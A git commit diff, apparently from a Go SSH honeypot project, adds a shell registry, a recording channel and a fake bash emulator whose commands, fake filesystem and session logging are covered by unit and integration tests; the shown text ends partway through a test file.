feat: add shell interface, registry, and bash shell emulator
Implement Phase 1.4: replaces the hardcoded banner/timeout stub with a proper shell system. Adds a Shell interface with weighted registry for shell selection, a RecordingChannel wrapper (pass-through for now, prep for Phase 2.3 replay), and a bash-like shell with fake filesystem, terminal line reader, and command handling (pwd, ls, cd, cat, whoami, hostname, id, uname, exit). Sessions now log command/output pairs to the store and record the shell name. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
This commit is contained in:
@@ -9,11 +9,19 @@ import (
|
||||
)
|
||||
|
||||
type Config struct {
|
||||
SSH SSHConfig `toml:"ssh"`
|
||||
Auth AuthConfig `toml:"auth"`
|
||||
Storage StorageConfig `toml:"storage"`
|
||||
LogLevel string `toml:"log_level"`
|
||||
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
||||
SSH SSHConfig `toml:"ssh"`
|
||||
Auth AuthConfig `toml:"auth"`
|
||||
Storage StorageConfig `toml:"storage"`
|
||||
Shell ShellConfig `toml:"shell"`
|
||||
LogLevel string `toml:"log_level"`
|
||||
LogFormat string `toml:"log_format"` // "text" (default) or "json"
|
||||
}
|
||||
|
||||
type ShellConfig struct {
|
||||
Hostname string `toml:"hostname"`
|
||||
Banner string `toml:"banner"`
|
||||
FakeUser string `toml:"fake_user"`
|
||||
Shells map[string]map[string]any `toml:"-"` // per-shell config extracted manually
|
||||
}
|
||||
|
||||
type StorageConfig struct {
|
||||
@@ -56,6 +64,14 @@ func Load(path string) (*Config, error) {
|
||||
return nil, fmt.Errorf("parsing config: %w", err)
|
||||
}
|
||||
|
||||
// Second pass: extract per-shell sub-tables (e.g. [shell.bash]).
|
||||
var raw map[string]any
|
||||
if err := toml.Unmarshal(data, &raw); err == nil {
|
||||
if shellSection, ok := raw["shell"].(map[string]any); ok {
|
||||
cfg.Shell.Shells = extractShellTables(shellSection)
|
||||
}
|
||||
}
|
||||
|
||||
applyDefaults(cfg)
|
||||
|
||||
if err := validate(cfg); err != nil {
|
||||
@@ -96,6 +112,36 @@ func applyDefaults(cfg *Config) {
|
||||
if cfg.Storage.RetentionInterval == "" {
|
||||
cfg.Storage.RetentionInterval = "1h"
|
||||
}
|
||||
if cfg.Shell.Hostname == "" {
|
||||
cfg.Shell.Hostname = "ubuntu-server"
|
||||
}
|
||||
if cfg.Shell.Banner == "" {
|
||||
cfg.Shell.Banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n"
|
||||
}
|
||||
}
|
||||
|
||||
// knownShellKeys are top-level keys in [shell] that are not per-shell sub-tables.
|
||||
var knownShellKeys = map[string]bool{
|
||||
"hostname": true,
|
||||
"banner": true,
|
||||
"fake_user": true,
|
||||
}
|
||||
|
||||
// extractShellTables pulls per-shell config sub-tables from the raw [shell] section.
|
||||
func extractShellTables(section map[string]any) map[string]map[string]any {
|
||||
result := make(map[string]map[string]any)
|
||||
for key, val := range section {
|
||||
if knownShellKeys[key] {
|
||||
continue
|
||||
}
|
||||
if sub, ok := val.(map[string]any); ok {
|
||||
result[key] = sub
|
||||
}
|
||||
}
|
||||
if len(result) == 0 {
|
||||
return nil
|
||||
}
|
||||
return result
|
||||
}
|
||||
|
||||
func validate(cfg *Config) error {
|
||||
|
||||
@@ -169,6 +169,59 @@ retention_interval = "2h"
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadShellDefaults(t *testing.T) {
|
||||
path := writeTemp(t, "")
|
||||
cfg, err := Load(path)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if cfg.Shell.Hostname != "ubuntu-server" {
|
||||
t.Errorf("default hostname = %q, want %q", cfg.Shell.Hostname, "ubuntu-server")
|
||||
}
|
||||
if cfg.Shell.Banner == "" {
|
||||
t.Error("default banner should not be empty")
|
||||
}
|
||||
if cfg.Shell.FakeUser != "" {
|
||||
t.Errorf("default fake_user = %q, want empty", cfg.Shell.FakeUser)
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadShellConfig(t *testing.T) {
|
||||
content := `
|
||||
[shell]
|
||||
hostname = "myhost"
|
||||
banner = "Custom banner\r\n"
|
||||
fake_user = "admin"
|
||||
|
||||
[shell.bash]
|
||||
custom_key = "value"
|
||||
`
|
||||
path := writeTemp(t, content)
|
||||
cfg, err := Load(path)
|
||||
if err != nil {
|
||||
t.Fatalf("unexpected error: %v", err)
|
||||
}
|
||||
if cfg.Shell.Hostname != "myhost" {
|
||||
t.Errorf("hostname = %q, want %q", cfg.Shell.Hostname, "myhost")
|
||||
}
|
||||
if cfg.Shell.Banner != "Custom banner\r\n" {
|
||||
t.Errorf("banner = %q, want %q", cfg.Shell.Banner, "Custom banner\r\n")
|
||||
}
|
||||
if cfg.Shell.FakeUser != "admin" {
|
||||
t.Errorf("fake_user = %q, want %q", cfg.Shell.FakeUser, "admin")
|
||||
}
|
||||
if cfg.Shell.Shells == nil {
|
||||
t.Fatal("Shells map should not be nil")
|
||||
}
|
||||
bashCfg, ok := cfg.Shell.Shells["bash"]
|
||||
if !ok {
|
||||
t.Fatal("Shells[\"bash\"] not found")
|
||||
}
|
||||
if bashCfg["custom_key"] != "value" {
|
||||
t.Errorf("Shells[\"bash\"][\"custom_key\"] = %v, want %q", bashCfg["custom_key"], "value")
|
||||
}
|
||||
}
|
||||
|
||||
func TestLoadMissingFile(t *testing.T) {
|
||||
_, err := Load("/nonexistent/path/config.toml")
|
||||
if err == nil {
|
||||
|
||||
@@ -14,28 +14,35 @@ import (
|
||||
|
||||
"git.t-juice.club/torjus/oubliette/internal/auth"
|
||||
"git.t-juice.club/torjus/oubliette/internal/config"
|
||||
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||
"git.t-juice.club/torjus/oubliette/internal/shell/bash"
|
||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||
"golang.org/x/crypto/ssh"
|
||||
)
|
||||
|
||||
const sessionTimeout = 30 * time.Second
|
||||
|
||||
type Server struct {
|
||||
cfg config.Config
|
||||
store storage.Store
|
||||
authenticator *auth.Authenticator
|
||||
sshConfig *ssh.ServerConfig
|
||||
logger *slog.Logger
|
||||
connSem chan struct{} // semaphore limiting concurrent connections
|
||||
cfg config.Config
|
||||
store storage.Store
|
||||
authenticator *auth.Authenticator
|
||||
sshConfig *ssh.ServerConfig
|
||||
logger *slog.Logger
|
||||
connSem chan struct{} // semaphore limiting concurrent connections
|
||||
shellRegistry *shell.Registry
|
||||
}
|
||||
|
||||
func New(cfg config.Config, store storage.Store, logger *slog.Logger) (*Server, error) {
|
||||
registry := shell.NewRegistry()
|
||||
if err := registry.Register(bash.NewBashShell(), 1); err != nil {
|
||||
return nil, fmt.Errorf("registering bash shell: %w", err)
|
||||
}
|
||||
|
||||
s := &Server{
|
||||
cfg: cfg,
|
||||
store: store,
|
||||
authenticator: auth.NewAuthenticator(cfg.Auth),
|
||||
logger: logger,
|
||||
connSem: make(chan struct{}, cfg.SSH.MaxConnections),
|
||||
shellRegistry: registry,
|
||||
}
|
||||
|
||||
hostKey, err := loadOrGenerateHostKey(cfg.SSH.HostKeyPath)
|
||||
@@ -126,8 +133,15 @@ func (s *Server) handleConn(conn net.Conn) {
|
||||
func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request, conn *ssh.ServerConn) {
|
||||
defer channel.Close()
|
||||
|
||||
// Select a shell from the registry.
|
||||
selectedShell, err := s.shellRegistry.Select()
|
||||
if err != nil {
|
||||
s.logger.Error("failed to select shell", "err", err)
|
||||
return
|
||||
}
|
||||
|
||||
ip := extractIP(conn.RemoteAddr())
|
||||
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), "")
|
||||
sessionID, err := s.store.CreateSession(context.Background(), ip, conn.User(), selectedShell.Name())
|
||||
if err != nil {
|
||||
s.logger.Error("failed to create session", "err", err)
|
||||
} else {
|
||||
@@ -138,6 +152,13 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
|
||||
}()
|
||||
}
|
||||
|
||||
s.logger.Info("session started",
|
||||
"remote_addr", conn.RemoteAddr(),
|
||||
"user", conn.User(),
|
||||
"shell", selectedShell.Name(),
|
||||
"session_id", sessionID,
|
||||
)
|
||||
|
||||
// Handle session requests (pty-req, shell, etc.)
|
||||
go func() {
|
||||
for req := range requests {
|
||||
@@ -154,33 +175,37 @@ func (s *Server) handleSession(channel ssh.Channel, requests <-chan *ssh.Request
|
||||
}
|
||||
}()
|
||||
|
||||
// Write a fake banner.
|
||||
fmt.Fprint(channel, "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n")
|
||||
fmt.Fprintf(channel, "Last login: %s from 10.0.0.1\r\n", time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
||||
fmt.Fprintf(channel, "%s@ubuntu:~$ ", conn.User())
|
||||
|
||||
// Hold connection open until timeout or client disconnect.
|
||||
timer := time.NewTimer(sessionTimeout)
|
||||
defer timer.Stop()
|
||||
|
||||
done := make(chan struct{})
|
||||
go func() {
|
||||
buf := make([]byte, 256)
|
||||
for {
|
||||
_, err := channel.Read(buf)
|
||||
if err != nil {
|
||||
close(done)
|
||||
return
|
||||
}
|
||||
}
|
||||
}()
|
||||
|
||||
select {
|
||||
case <-timer.C:
|
||||
s.logger.Info("session timed out", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
||||
case <-done:
|
||||
s.logger.Info("session closed by client", "remote_addr", conn.RemoteAddr(), "user", conn.User())
|
||||
// Build session context.
|
||||
var shellCfg map[string]any
|
||||
if s.cfg.Shell.Shells != nil {
|
||||
shellCfg = s.cfg.Shell.Shells[selectedShell.Name()]
|
||||
}
|
||||
sessCtx := &shell.SessionContext{
|
||||
SessionID: sessionID,
|
||||
Username: conn.User(),
|
||||
RemoteAddr: ip,
|
||||
ClientVersion: string(conn.ClientVersion()),
|
||||
Store: s.store,
|
||||
ShellConfig: shellCfg,
|
||||
CommonConfig: shell.ShellCommonConfig{
|
||||
Hostname: s.cfg.Shell.Hostname,
|
||||
Banner: s.cfg.Shell.Banner,
|
||||
FakeUser: s.cfg.Shell.FakeUser,
|
||||
},
|
||||
}
|
||||
|
||||
// Wrap channel in RecordingChannel for future byte-level recording.
|
||||
recorder := shell.NewRecordingChannel(channel)
|
||||
|
||||
if err := selectedShell.Handle(context.Background(), sessCtx, recorder); err != nil {
|
||||
s.logger.Error("shell error", "err", err, "session_id", sessionID)
|
||||
}
|
||||
|
||||
s.logger.Info("session ended",
|
||||
"remote_addr", conn.RemoteAddr(),
|
||||
"user", conn.User(),
|
||||
"session_id", sessionID,
|
||||
)
|
||||
}
|
||||
|
||||
func (s *Server) passwordCallback(conn ssh.ConnMetadata, password []byte) (*ssh.Permissions, error) {
|
||||
|
||||
@@ -1,11 +1,13 @@
|
||||
package server
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"log/slog"
|
||||
"net"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
@@ -109,6 +111,10 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
||||
{Username: "root", Password: "toor"},
|
||||
},
|
||||
},
|
||||
Shell: config.ShellConfig{
|
||||
Hostname: "ubuntu-server",
|
||||
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||
},
|
||||
LogLevel: "debug",
|
||||
}
|
||||
|
||||
@@ -152,7 +158,7 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
||||
time.Sleep(50 * time.Millisecond)
|
||||
}
|
||||
|
||||
// Test static credential login.
|
||||
// Test static credential login with shell interaction.
|
||||
t.Run("static_cred", func(t *testing.T) {
|
||||
clientCfg := &ssh.ClientConfig{
|
||||
User: "root",
|
||||
@@ -172,6 +178,62 @@ func TestIntegrationSSHConnect(t *testing.T) {
|
||||
t.Fatalf("new session: %v", err)
|
||||
}
|
||||
defer session.Close()
|
||||
|
||||
// Request PTY and shell.
|
||||
if err := session.RequestPty("xterm", 80, 40, ssh.TerminalModes{}); err != nil {
|
||||
t.Fatalf("request pty: %v", err)
|
||||
}
|
||||
|
||||
stdin, err := session.StdinPipe()
|
||||
if err != nil {
|
||||
t.Fatalf("stdin pipe: %v", err)
|
||||
}
|
||||
|
||||
var output bytes.Buffer
|
||||
session.Stdout = &output
|
||||
|
||||
if err := session.Shell(); err != nil {
|
||||
t.Fatalf("shell: %v", err)
|
||||
}
|
||||
|
||||
// Wait for the prompt, then send commands.
|
||||
time.Sleep(500 * time.Millisecond)
|
||||
stdin.Write([]byte("pwd\r"))
|
||||
time.Sleep(200 * time.Millisecond)
|
||||
stdin.Write([]byte("whoami\r"))
|
||||
time.Sleep(200 * time.Millisecond)
|
||||
stdin.Write([]byte("exit\r"))
|
||||
|
||||
// Wait for session to end.
|
||||
session.Wait()
|
||||
|
||||
out := output.String()
|
||||
if !strings.Contains(out, "Welcome to Ubuntu") {
|
||||
t.Errorf("output should contain banner, got: %s", out)
|
||||
}
|
||||
if !strings.Contains(out, "/root") {
|
||||
t.Errorf("output should contain /root from pwd, got: %s", out)
|
||||
}
|
||||
if !strings.Contains(out, "root") {
|
||||
t.Errorf("output should contain 'root' from whoami, got: %s", out)
|
||||
}
|
||||
|
||||
// Verify session logs were recorded.
|
||||
if len(store.SessionLogs) < 2 {
|
||||
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||
}
|
||||
|
||||
// Verify session was created with shell name.
|
||||
var foundBash bool
|
||||
for _, s := range store.Sessions {
|
||||
if s.ShellName == "bash" {
|
||||
foundBash = true
|
||||
break
|
||||
}
|
||||
}
|
||||
if !foundBash {
|
||||
t.Error("expected a session with shell_name='bash'")
|
||||
}
|
||||
})
|
||||
|
||||
// Test wrong password is rejected.
|
||||
|
||||
158
internal/shell/bash/bash.go
Normal file
158
internal/shell/bash/bash.go
Normal file
@@ -0,0 +1,158 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"context"
|
||||
"fmt"
|
||||
"io"
|
||||
"strings"
|
||||
"time"
|
||||
|
||||
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||
)
|
||||
|
||||
const sessionTimeout = 5 * time.Minute
|
||||
|
||||
// BashShell emulates a basic bash-like shell.
|
||||
type BashShell struct{}
|
||||
|
||||
// NewBashShell returns a new BashShell instance.
|
||||
func NewBashShell() *BashShell {
|
||||
return &BashShell{}
|
||||
}
|
||||
|
||||
func (b *BashShell) Name() string { return "bash" }
|
||||
func (b *BashShell) Description() string { return "Basic bash-like shell emulator" }
|
||||
|
||||
func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||
defer cancel()
|
||||
|
||||
username := sess.Username
|
||||
if sess.CommonConfig.FakeUser != "" {
|
||||
username = sess.CommonConfig.FakeUser
|
||||
}
|
||||
hostname := sess.CommonConfig.Hostname
|
||||
|
||||
fs := newFilesystem(hostname)
|
||||
state := &shellState{
|
||||
cwd: "/root",
|
||||
username: username,
|
||||
hostname: hostname,
|
||||
fs: fs,
|
||||
}
|
||||
|
||||
// Send banner.
|
||||
if sess.CommonConfig.Banner != "" {
|
||||
fmt.Fprint(rw, sess.CommonConfig.Banner)
|
||||
}
|
||||
fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n",
|
||||
time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
||||
|
||||
for {
|
||||
prompt := formatPrompt(state)
|
||||
if _, err := fmt.Fprint(rw, prompt); err != nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
line, err := readLine(ctx, rw)
|
||||
if err == io.EOF {
|
||||
fmt.Fprint(rw, "logout\r\n")
|
||||
return nil
|
||||
}
|
||||
if err != nil {
|
||||
return nil
|
||||
}
|
||||
|
||||
trimmed := strings.TrimSpace(line)
|
||||
if trimmed == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
result := dispatch(state, trimmed)
|
||||
|
||||
var output string
|
||||
if result.output != "" {
|
||||
output = result.output
|
||||
// Convert newlines to \r\n for terminal display.
|
||||
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||
fmt.Fprintf(rw, "%s\r\n", output)
|
||||
}
|
||||
|
||||
// Log command and output to store.
|
||||
if sess.Store != nil {
|
||||
sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output)
|
||||
}
|
||||
|
||||
if result.exit {
|
||||
return nil
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func formatPrompt(state *shellState) string {
|
||||
cwd := state.cwd
|
||||
if cwd == "/root" {
|
||||
cwd = "~"
|
||||
} else if strings.HasPrefix(cwd, "/root/") {
|
||||
cwd = "~" + cwd[5:]
|
||||
}
|
||||
return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd)
|
||||
}
|
||||
|
||||
// readLine reads a line of input byte-by-byte, handling backspace, Ctrl+C, and Ctrl+D.
|
||||
func readLine(ctx context.Context, rw io.ReadWriter) (string, error) {
|
||||
var buf []byte
|
||||
b := make([]byte, 1)
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-ctx.Done():
|
||||
return "", ctx.Err()
|
||||
default:
|
||||
}
|
||||
|
||||
n, err := rw.Read(b)
|
||||
if err != nil {
|
||||
return "", err
|
||||
}
|
||||
if n == 0 {
|
||||
continue
|
||||
}
|
||||
|
||||
ch := b[0]
|
||||
switch {
|
||||
case ch == '\r' || ch == '\n':
|
||||
fmt.Fprint(rw, "\r\n")
|
||||
return string(buf), nil
|
||||
|
||||
case ch == 4: // Ctrl+D
|
||||
if len(buf) == 0 {
|
||||
return "", io.EOF
|
||||
}
|
||||
|
||||
case ch == 3: // Ctrl+C
|
||||
fmt.Fprint(rw, "^C\r\n")
|
||||
return "", nil
|
||||
|
||||
case ch == 127 || ch == 8: // DEL or Backspace
|
||||
if len(buf) > 0 {
|
||||
buf = buf[:len(buf)-1]
|
||||
fmt.Fprint(rw, "\b \b")
|
||||
}
|
||||
|
||||
case ch == 27: // ESC - start of escape sequence
|
||||
// Read and discard the rest of the escape sequence.
|
||||
// Most are 3 bytes: ESC [ X (arrow keys, etc.)
|
||||
next := make([]byte, 1)
|
||||
rw.Read(next)
|
||||
if next[0] == '[' {
|
||||
rw.Read(next) // read the final byte
|
||||
}
|
||||
|
||||
case ch >= 32 && ch < 127: // printable ASCII
|
||||
buf = append(buf, ch)
|
||||
rw.Write([]byte{ch})
|
||||
}
|
||||
}
|
||||
}
|
||||
198
internal/shell/bash/bash_test.go
Normal file
198
internal/shell/bash/bash_test.go
Normal file
@@ -0,0 +1,198 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"context"
|
||||
"io"
|
||||
"strings"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"git.t-juice.club/torjus/oubliette/internal/shell"
|
||||
"git.t-juice.club/torjus/oubliette/internal/storage"
|
||||
)
|
||||
|
||||
type rwCloser struct {
|
||||
io.Reader
|
||||
io.Writer
|
||||
closed bool
|
||||
}
|
||||
|
||||
func (r *rwCloser) Close() error {
|
||||
r.closed = true
|
||||
return nil
|
||||
}
|
||||
|
||||
func TestFormatPrompt(t *testing.T) {
|
||||
tests := []struct {
|
||||
cwd string
|
||||
want string
|
||||
}{
|
||||
{"/root", "root@host:~# "},
|
||||
{"/root/sub", "root@host:~/sub# "},
|
||||
{"/tmp", "root@host:/tmp# "},
|
||||
{"/", "root@host:/# "},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"}
|
||||
got := formatPrompt(state)
|
||||
if got != tt.want {
|
||||
t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func TestReadLineEnter(t *testing.T) {
|
||||
input := bytes.NewBufferString("hello\r")
|
||||
var output bytes.Buffer
|
||||
rw := struct {
|
||||
io.Reader
|
||||
io.Writer
|
||||
}{input, &output}
|
||||
|
||||
ctx := context.Background()
|
||||
line, err := readLine(ctx, rw)
|
||||
if err != nil {
|
||||
t.Fatalf("readLine: %v", err)
|
||||
}
|
||||
if line != "hello" {
|
||||
t.Errorf("line = %q, want %q", line, "hello")
|
||||
}
|
||||
}
|
||||
|
||||
func TestReadLineBackspace(t *testing.T) {
|
||||
// Type "helo", backspace, then "lo\r"
|
||||
input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'})
|
||||
var output bytes.Buffer
|
||||
rw := struct {
|
||||
io.Reader
|
||||
io.Writer
|
||||
}{input, &output}
|
||||
|
||||
ctx := context.Background()
|
||||
line, err := readLine(ctx, rw)
|
||||
if err != nil {
|
||||
t.Fatalf("readLine: %v", err)
|
||||
}
|
||||
if line != "hello" {
|
||||
t.Errorf("line = %q, want %q", line, "hello")
|
||||
}
|
||||
}
|
||||
|
||||
func TestReadLineCtrlC(t *testing.T) {
|
||||
input := bytes.NewBuffer([]byte("partial\x03"))
|
||||
var output bytes.Buffer
|
||||
rw := struct {
|
||||
io.Reader
|
||||
io.Writer
|
||||
}{input, &output}
|
||||
|
||||
ctx := context.Background()
|
||||
line, err := readLine(ctx, rw)
|
||||
if err != nil {
|
||||
t.Fatalf("readLine: %v", err)
|
||||
}
|
||||
if line != "" {
|
||||
t.Errorf("line after Ctrl+C = %q, want empty", line)
|
||||
}
|
||||
}
|
||||
|
||||
func TestReadLineCtrlD(t *testing.T) {
|
||||
input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line
|
||||
var output bytes.Buffer
|
||||
rw := struct {
|
||||
io.Reader
|
||||
io.Writer
|
||||
}{input, &output}
|
||||
|
||||
ctx := context.Background()
|
||||
_, err := readLine(ctx, rw)
|
||||
if err != io.EOF {
|
||||
t.Fatalf("expected io.EOF, got %v", err)
|
||||
}
|
||||
}
|
||||
|
||||
func TestBashShellHandle(t *testing.T) {
|
||||
store := storage.NewMemoryStore()
|
||||
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash")
|
||||
|
||||
sess := &shell.SessionContext{
|
||||
SessionID: sessID,
|
||||
Username: "root",
|
||||
Store: store,
|
||||
CommonConfig: shell.ShellCommonConfig{
|
||||
Hostname: "testhost",
|
||||
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||
},
|
||||
}
|
||||
|
||||
// Simulate typing commands followed by "exit\r"
|
||||
commands := "pwd\rwhoami\rexit\r"
|
||||
clientInput := bytes.NewBufferString(commands)
|
||||
var clientOutput bytes.Buffer
|
||||
rw := &rwCloser{
|
||||
Reader: clientInput,
|
||||
Writer: &clientOutput,
|
||||
}
|
||||
|
||||
sh := NewBashShell()
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
err := sh.Handle(ctx, sess, rw)
|
||||
if err != nil {
|
||||
t.Fatalf("Handle: %v", err)
|
||||
}
|
||||
|
||||
output := clientOutput.String()
|
||||
|
||||
// Should contain banner.
|
||||
if !strings.Contains(output, "Welcome to Ubuntu") {
|
||||
t.Error("output should contain banner")
|
||||
}
|
||||
|
||||
// Should contain prompt with hostname.
|
||||
if !strings.Contains(output, "root@testhost") {
|
||||
t.Errorf("output should contain prompt, got: %s", output)
|
||||
}
|
||||
|
||||
// Check session logs were recorded.
|
||||
if len(store.SessionLogs) < 2 {
|
||||
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||
}
|
||||
}
|
||||
|
||||
func TestBashShellFakeUser(t *testing.T) {
|
||||
store := storage.NewMemoryStore()
|
||||
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash")
|
||||
|
||||
sess := &shell.SessionContext{
|
||||
SessionID: sessID,
|
||||
Username: "attacker",
|
||||
Store: store,
|
||||
CommonConfig: shell.ShellCommonConfig{
|
||||
Hostname: "testhost",
|
||||
FakeUser: "admin",
|
||||
},
|
||||
}
|
||||
|
||||
commands := "whoami\rexit\r"
|
||||
clientInput := bytes.NewBufferString(commands)
|
||||
var clientOutput bytes.Buffer
|
||||
rw := &rwCloser{
|
||||
Reader: clientInput,
|
||||
Writer: &clientOutput,
|
||||
}
|
||||
|
||||
sh := NewBashShell()
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||
defer cancel()
|
||||
|
||||
sh.Handle(ctx, sess, rw)
|
||||
|
||||
output := clientOutput.String()
|
||||
if !strings.Contains(output, "admin") {
|
||||
t.Errorf("output should contain fake user 'admin', got: %s", output)
|
||||
}
|
||||
}
|
||||
119
internal/shell/bash/commands.go
Normal file
119
internal/shell/bash/commands.go
Normal file
@@ -0,0 +1,119 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"runtime"
|
||||
"sort"
|
||||
"strings"
|
||||
)
|
||||
|
||||
type shellState struct {
|
||||
cwd string
|
||||
username string
|
||||
hostname string
|
||||
fs *filesystem
|
||||
}
|
||||
|
||||
type commandResult struct {
|
||||
output string
|
||||
exit bool
|
||||
}
|
||||
|
||||
func dispatch(state *shellState, line string) commandResult {
|
||||
fields := strings.Fields(line)
|
||||
if len(fields) == 0 {
|
||||
return commandResult{}
|
||||
}
|
||||
|
||||
cmd := fields[0]
|
||||
args := fields[1:]
|
||||
|
||||
switch cmd {
|
||||
case "pwd":
|
||||
return commandResult{output: state.cwd}
|
||||
case "whoami":
|
||||
return commandResult{output: state.username}
|
||||
case "hostname":
|
||||
return commandResult{output: state.hostname}
|
||||
case "id":
|
||||
return cmdID(state)
|
||||
case "uname":
|
||||
return cmdUname(state, args)
|
||||
case "ls":
|
||||
return cmdLs(state, args)
|
||||
case "cd":
|
||||
return cmdCd(state, args)
|
||||
case "cat":
|
||||
return cmdCat(state, args)
|
||||
case "exit", "logout":
|
||||
return commandResult{exit: true}
|
||||
default:
|
||||
return commandResult{output: fmt.Sprintf("%s: command not found", cmd)}
|
||||
}
|
||||
}
|
||||
|
||||
func cmdID(state *shellState) commandResult {
|
||||
return commandResult{
|
||||
output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username),
|
||||
}
|
||||
}
|
||||
|
||||
func cmdUname(state *shellState, args []string) commandResult {
|
||||
if len(args) > 0 && args[0] == "-a" {
|
||||
return commandResult{
|
||||
output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH),
|
||||
}
|
||||
}
|
||||
return commandResult{output: "Linux"}
|
||||
}
|
||||
|
||||
func cmdLs(state *shellState, args []string) commandResult {
|
||||
target := state.cwd
|
||||
if len(args) > 0 {
|
||||
target = resolvePath(state.cwd, args[0])
|
||||
}
|
||||
|
||||
names, err := state.fs.list(target)
|
||||
if err != nil {
|
||||
return commandResult{output: err.Error()}
|
||||
}
|
||||
|
||||
sort.Strings(names)
|
||||
return commandResult{output: strings.Join(names, " ")}
|
||||
}
|
||||
|
||||
func cmdCd(state *shellState, args []string) commandResult {
|
||||
target := "/root"
|
||||
if len(args) > 0 {
|
||||
target = resolvePath(state.cwd, args[0])
|
||||
}
|
||||
|
||||
if !state.fs.exists(target) {
|
||||
return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])}
|
||||
}
|
||||
if !state.fs.isDirectory(target) {
|
||||
return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])}
|
||||
}
|
||||
|
||||
state.cwd = target
|
||||
return commandResult{}
|
||||
}
|
||||
|
||||
func cmdCat(state *shellState, args []string) commandResult {
|
||||
if len(args) == 0 {
|
||||
return commandResult{}
|
||||
}
|
||||
|
||||
var parts []string
|
||||
for _, arg := range args {
|
||||
p := resolvePath(state.cwd, arg)
|
||||
content, err := state.fs.read(p)
|
||||
if err != nil {
|
||||
parts = append(parts, err.Error())
|
||||
} else {
|
||||
parts = append(parts, strings.TrimRight(content, "\n"))
|
||||
}
|
||||
}
|
||||
|
||||
return commandResult{output: strings.Join(parts, "\n")}
|
||||
}
|
||||
201
internal/shell/bash/commands_test.go
Normal file
201
internal/shell/bash/commands_test.go
Normal file
@@ -0,0 +1,201 @@
|
||||
package bash
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func newTestState() *shellState {
|
||||
fs := newFilesystem("testhost")
|
||||
return &shellState{
|
||||
cwd: "/root",
|
||||
username: "root",
|
||||
hostname: "testhost",
|
||||
fs: fs,
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdPwd(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "pwd")
|
||||
if r.output != "/root" {
|
||||
t.Errorf("pwd = %q, want %q", r.output, "/root")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdWhoami(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "whoami")
|
||||
if r.output != "root" {
|
||||
t.Errorf("whoami = %q, want %q", r.output, "root")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdHostname(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "hostname")
|
||||
if r.output != "testhost" {
|
||||
t.Errorf("hostname = %q, want %q", r.output, "testhost")
|
||||
}
|
||||
}
|
||||
|
||||
func TestCmdId(t *testing.T) {
|
||||
state := newTestState()
|
||||
r := dispatch(state, "id")
|
||||
if !strings.Contains(r.output, "uid=0(root)") {
|
||||
